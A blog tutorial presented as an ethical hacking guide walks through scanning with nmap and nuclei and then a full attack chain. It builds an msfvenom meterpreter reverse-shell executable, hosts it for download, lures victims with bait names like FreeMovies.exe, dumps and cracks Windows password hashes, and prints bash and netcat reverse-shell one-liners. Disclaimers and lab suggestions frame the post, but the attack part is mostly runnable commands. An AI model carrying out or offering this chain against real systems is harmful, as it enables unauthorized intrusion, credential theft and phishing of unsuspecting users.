Computer Hacking: An Ethical Hacking Guide

Man wearing Anonymous mask in a server room

Basic Steps to Computer Hacking


This guide is all about computer hacking, and how the cyber criminals gain access to our systems. Basically, to hack into any computer, we need to find a weakness. We find weaknesses by scanning the system for vulnerabilities. Once vulnerabilities are found they can be researched and then exploited. In this Ethical hacking guide, we will be using the Kali Linux operating system and any steps provided will be explained using Kali.

Disclaimer: This guide will layout the basic steps to hacking computer systems for educational purposes only and is in no way meant to be used for criminal activities.

In this guide we cover:

  • Kali Linux.
  • Scanning Targets.
  • Finding Exploits.
  • Creating Payloads.
  • Exfiltrating Passwords.
Ethical Hacking Operating System Kali Linux Logo

What is Kali Linux?

Kali Linux is a popular and powerful open-source operating system that is specifically designed for penetration testing, digital forensics, and cybersecurity-related tasks. It is based on Debian, one of the most widely used Linux distributions, and is maintained and funded by Offensive Security, a cybersecurity training company. Here are some key aspects of Kali Linux:

  • Penetration Testing: Kali Linux is widely used by cybersecurity professionals, ethical hackers, and penetration testers for assessing the security of computer systems and networks. It comes preloaded with a wide range of security tools and utilities for various purposes, including network scanning, vulnerability assessment, and exploiting security weaknesses.

  • Open Source: Kali Linux is free and open-source software, which means that anyone can download, use, and modify it, subject to its licensing terms.

  • Security Tools: It offers a vast collection of pre-installed security tools, including tools for password cracking, network analysis, web application testing, wireless network analysis, and more. Some well-known tools included in Kali Linux are Metasploit, Nmap, Wireshark, and Aircrack-ng.

  • Regular Updates: Kali Linux is actively maintained and updated, ensuring that security professionals have access to the latest tools and features. Users can easily keep their installations up-to-date using the package management system.

  • Customization: Kali Linux allows users to customize their installations by adding or removing tools according to their specific needs, making it a versatile platform for various cybersecurity tasks.

  • Documentation and Community: Kali Linux has a robust community and official documentation, making it easy for users to get started and find help when needed. The community also offers forums, tutorials, and training resources.

  • Legal and Ethical Use: It’s important to note that Kali Linux is intended for legal and ethical use in security testing, research, and education. Unauthorized or unethical use of the tools on Kali Linux can lead to legal consequences.

Kali Linux is a valuable tool for cybersecurity professionals and enthusiasts who are committed to securing systems, identifying vulnerabilities, and understanding cybersecurity threats. It’s essential to use it responsibly and ethically in compliance with applicable laws and regulations.

How to Install Kali

To Install Kali Linux, you can follow our guide here: How to Install Kali

Scanning The Target

First, you need a target, we recommend you set up another system in your own home to practice against.

Only ever hack networks and systems you own or have explicit written permission to do so from the owner.

You need know the IP address of the target before you can scan their network. Once you have a target IP, you can ping the target to make sure it’s online or even existing.

For this guide we presume you already have the targets IP.

The IP would usually look something like but if you are targeting a system inside your own network, it will look something like or

Open your Kali Terminal and type:

ping <IP>

If you get a response, you know the system is online and available. Now we can begin scanning.

We need to find any information on open ports and the services running on those ports.


Nmap, short for “Network Mapper,” is a widely used open-source network scanning tool and security scanner. It’s designed to help network administrators and security professionals discover and analyze network hosts, services, and potential vulnerabilities. Nmap provides valuable information for network management, security assessment, and troubleshooting.

Here are some key features and functions of Nmap:

  • Network Discovery: Nmap can be used to discover devices and hosts on a network. It sends packets to target IP addresses and analyzes the responses to determine which hosts are online.

  • Port Scanning: Nmap can scan and identify open and closed ports on a host. This information is crucial for understanding the services that are running on a system.

  • Service Detection: Nmap can often identify the services and applications running on open ports. This helps administrators understand the software and versions in use, which is valuable for security assessments.

  • Operating System Detection: Nmap can sometimes determine the operating system of a target host based on various characteristics of network responses. This can be helpful for network profiling.

  • Scripting and Automation: Nmap allows users to write custom scripts using the Nmap Scripting Engine (NSE) to perform specific tasks, such as vulnerability scanning, banner grabbing, and more.

  • Vulnerability Scanning: While Nmap itself is not a vulnerability scanner, it can be used as a starting point for identifying potential vulnerabilities. By knowing which services and versions are running on a system, administrators can cross-reference this information with known vulnerabilities.

  • Output Formats: Nmap provides various output formats, including text, XML, and even interactive graphical interfaces, making it versatile for different user needs.

  • Flexibility: Nmap is highly configurable and can be used in a variety of ways, from simple network discovery to complex security assessments.

Nmap is a powerful tool, but it’s important to use it responsibly and within the boundaries of the law and acceptable use policies.

Unauthorized or unethical use of Nmap for scanning networks or systems that you do not own or have permission to scan can lead to legal consequences.

Type the following command in the Kali terminal, replace <IP> with the targets IP:

sudo nmap -p- -sV -sC <IP>
Command Breakdown
  • -p- To scan all ports
  • -sV To List all services running on those ports
  • -sC To run all default scripts

Some more useful scan operators include:

  • -sT For a TCP scan (TCP is Transport Control Protocol)
  • -sU For a UDP scan (UDP is User Datagram Protocol)
  • -sS For a SYN scan (Also known as a stealth scan)

These scans can take a long time take a break and grab a cup of Coffee while you wait.

Once any scan finishes You should always take notes of the output results. Most important to note is the services and open ports but anything else that looks interesting should be noted.

You can automatically send the data to a text file using the >> (append) operator. For example:

sudo nmap -p- -sV -sC >> nmapScan.txt

Finding Known Vulnerabilities

We can utilize Nmap to scan for vulnerabilities too. In terminal type:

sudo nmap <IP> --script=vuln

If lucky, you will have detected some vulnerabilities. Nmap kindly gives corresponding CVE-000-00 numbers, making it easier to research detected vulnerabilities.

Note this information down and go to to do your own research on how to exploit them. If unsuccessful we can try a different vulnerability scanner.

In terminal type:

nuclei help

If Nuclei is installed, we should see some help pages.

If Nuclei is not installed, we can install it using the following command:

sudo apt install nuclei

Now with Nuclei installed we can begin our scan. In the terminal type:

nuclei -t nuclei-templates/network -u <IP>

Now you have detected a vulnerability look it up on to research how to exploit it.

So, to wrap up…

  • We scan the system.
  • Find what services are using which ports.
  • Research those services.
  • Run vulnerability scanners to find exploits.
  • Use those exploits to gain access to the system.

You can practice these techniques, and see instant results, you can attack operating systems like the Metasploitable. This is an operating system created with deliberate vulnerabilities to be exploited and is a great system to practice your hacking techniques against first. You can install the Metasploitable attack box to a Raspberry Pi or even to your Windows system using a hypervisor such as VirtualBox or VMware. If you don’t know about VirtualBox please read our guide on installing any operating system to VirtualBox

Attack Boxes

“Attack boxes” is a term used in cybersecurity to refer to computer systems or environments that are intentionally set up and configured for offensive security testing, including penetration testing, ethical hacking, and vulnerability assessment. These systems are used by cybersecurity professionals and ethical hackers to simulate real-world attack scenarios and to assess the security of networks, applications, and infrastructure.

Some Attack Boxes are themed and can be great fun, and a great way to practice and learn new techniques. I highly recommend the Mr. Robot box to start with, it’s not too complicated and tons of nostalgic fun if you’re a fan of the show.

You can find Attack Boxes to practice with at these sites below:

Phishing for Access

With the use of social engineering and phishing we can trick the target into giving us access. We can embed malicious code into a seemingly innocent file like a .pdf or .exe this is known as a payload. Once the target opens the payload, a connection is made back to our own system, giving us backdoor access to theirs.

The name of the payload can be important, it should be enticing to the target in mind. Maybe the target streams movies online, then you should name the payload something like FreeMovies.exe, as I said the name depends on the target you are trying to attack.

You can even create a simple website to host the payloads and fool the target into installing the payload.

Some examples of payload names could be:

  • FreeMovies
  • FreeMusic
  • FreePorn
Creating The Executable Payload for Windows

In the terminal type:

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<Your_IP> LPORT=4321 -f exe > payloadX64.exe

Make sure to replace <Your_IP> with your own IP. You can change the LPORT if you wish but it’s not necessary, but you will need to remember the port number.

After you run this command, the payload will be created almost instantly. This payload is designed for Windows 64-bit systems, if you needed it for 32-bit systems you can use x86 instead of x64.

That’s it, the Payload has been created go locate where it was saved and keep it somewhere safe for now.

Hosting The Payload

The payload needs to be made available online, so it is accessible to the target. You can host it directly from your Kali machine or anywhere you like.

To host from your Kali machine, you need to start a http webserver on your system, open terminal and type:

systemctl start apache2.service

Now we need to move the payload to the html directory. In the terminal navigate to where your payload is stored and type the following command:

sudo mv payloadX64.exe /var/www/html

That’s it! The payload is now available online via port 80 (HTTP port). Now it’s down to you how you get it onto the target machine.

Before the target opens the payload, you will need to have your listener terminal open and waiting. Open a new terminal which will be used specifically for the listener and type the following commmands:


Starts the Metasploit program.

use multi/handler

multi/handler is the module we need use. 

set payload windows/x64/meterpreter/reverse_tcp

You set the correct payload for the one we created previously.

show options

You show options to see what necessary settings are required.

set LHOST <Your_IP>

You set LHOST to your own IP.

set LPORT 4321

You set LPORT to the port set within the payload.

show options

You show options again to make sure your settings are correct.


Finally, you run the listener.

Once the target opens the payload the listener window will receive a reverse connection back to the targets system, and you will finally have access.

Exfiltrating Password Credentials

Now, hopefully we’re in the target system we can start looking around. One thing we can do while being in the targets system is to exfiltrate passwords.

To exfiltrate passwords, run these following commands in the listener window:

use post/gather/hashdump
run -j

Access denied? then you need to try migrating to another service. In meterpreter window run these commands:

migrate <PID>

Migrating to the windows explorer.exe process is a good option and will provide better stability for your connection incase the target close’s the payload they opened.

We can even use Metasploit to suggest vulnerabilities to escalate our level of access, this is called privilege escalation.

In meterpreter window run these commands:

use post/multi/recon/local_exploit_suggester
show options
run -j

Note chosen vulnerability and run the following commands in meterpreter window, replacing “Vulnerability” with your chosen vulnerability.

use "Vulnerability"
run -j
use post/windows/gather/hashdump
show options

If successful, copy the entire password output to a file called tobecracked.txt.

Cracking The Password Database

Now you have the password hashes they need to be cracked. To crack these passwords, we can utilize a tool called John the Ripper. John the Ripper is a great password cracking tool and you can learn more about using this tool in our guide here: John the Ripper

Open another terminal (leave listener terminal open) and type in the new terminal window:

john --format=NT ./tobecracked.txt

Grab a cup of Coffee this could a long time. Once completed, type in Terminal:

john --format=NT ./tobecracked.txt --show

That’s it you should have the passwords displayed on your screen. Test the passwords by trying to log into a service such as SSH.

Other Reverse Shell Payloads

I’m not going to go into depth here, but I will give you some more examples:

Bash Reverse Shell payload

Create a file called and enter the following code to the file:

bash -i >& /dev/tcp/"Your_IP"/4321 0>&1

Same as before, this needs to be activated on the target machine. You don’t need to use Metasploit every time you need a listener you could also use Netcat. 

Open a new terminal type:

nc -lvp 4321

That’s it, the listener is waiting for a reverse connection back to it.

Netcat Reverse Shell

If the target has Netcat installed, gaining access is very simple. You need to open a listener terminal, this time we will use Netcat for the listener, to do so type the following command:

nc -lvp 4321

You can now run the following command on the targets system:

nc -e /bin/sh <Your_IP> 4321

That’s it, this is the end of our hacking systems guide


While this post has provided an overview of the fundamental steps involved in hacking computer systems, it is crucial to emphasize that the information presented here is meant for educational and defensive purposes only. Ethical hacking and cybersecurity are essential practices for safeguarding digital infrastructure and protecting against malicious actors.

Understanding the methods employed by potential attackers, as outlined in this post, equips security professionals and organizations with the knowledge to proactively defend against cyber threats. By employing these techniques in ethical hacking and penetration testing, security experts can identify vulnerabilities and address them before they can be exploited by malicious hackers.

Remember that engaging in unauthorized or malicious hacking activities is not only illegal but also unethical. It is of utmost importance to always obtain proper authorization and adhere to legal and ethical standards when assessing the security of computer systems.

Stay on the right side of the law guys.

Happy Hacking!

Ethical Hacking Guides

We have many guides to help you on your journey into the world of Ethical Hacking. If this is something you find interesting, please take a look here today: Ethical Hacking Guides.


ALFA Network Wi-Fi Adapter:

This Wi-Fi adapter is essential if you are to learn Wi-Fi Hacking.

Luke Barber

Hello, fellow tech enthusiasts! I'm Luke, a passionate learner and explorer in the vast realms of technology. Welcome to my digital space where I share the insights and adventures gained from my journey into the fascinating worlds of Arduino, Python, Linux, Ethical Hacking, and beyond. Armed with qualifications including CompTIA A+, Sec+, Cisco CCNA, Unix/Linux and Bash Shell Scripting, JavaScript Application Programming, Python Programming and Ethical Hacking, I thrive in the ever-evolving landscape of coding, computers, and networks. As a tech enthusiast, I'm on a mission to simplify the complexities of technology through my blogs, offering a glimpse into the marvels of Arduino, Python, Linux, and Ethical Hacking techniques. Whether you're a fellow coder or a curious mind, I invite you to join me on this journey of continuous learning and discovery.

Leave a Reply

Your email address will not be published. Required fields are marked *

Verified by MonsterInsights